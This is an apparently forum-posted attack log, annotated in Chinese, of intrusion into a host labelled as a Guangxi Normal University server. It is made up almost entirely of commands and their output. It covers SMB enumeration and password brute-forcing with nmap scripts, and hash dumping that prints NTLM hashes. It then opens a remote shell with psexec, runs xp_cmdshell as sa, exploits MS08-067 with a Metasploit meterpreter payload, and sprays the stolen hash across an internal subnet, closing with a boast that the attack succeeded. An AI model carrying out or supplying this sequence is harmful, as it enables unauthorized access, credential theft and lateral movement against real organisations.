广西师范网站http://202.103.242.241/
root@bt:~# nmap -sS -sV 202.103.242.241
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
135/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
1025/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open msrpc Microsoft Windows RPC
3372/tcp open msdtc?
3389/tcp open ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root 1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
//此乃使用脚本扫描远程机器所存在的账户名
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-enum-users:
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
//查看共享
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-enum-shares:
| ADMIN$
| Anonymous access: <none>
| C$
| Anonymous access: <none>
| IPC$
|_ Anonymous access: READ
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
//获取用户密码
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-brute:
| administrator:<blank> => Login was successful
|_ test:123456 => Login was successful
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2 //抓hash
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe //获取一个cmdshell
PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
C:\WINNT\system32>ipconfig
Windows 2000 IP Configuration
Ethernet adapter 本地连接:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1
& B4 }: z$ S! H6 U. l/ ^C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令, u o: N% h2 Q- n; `( n
% m6 o2 D6 o; b4 z2 \, J
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-check-vulns:
|_ MS08-067: VULNERABLE
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N] (ctrl+z)
msf exploit(ms08_067_netapi) > sessions -l
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator
root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
//利用用户名跟获取的hash尝试对整段内网进行登录
Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-brute:
|_ administrator:<blank> => Login was successful
攻击成功,一个简单的msf+nmap攻击~~·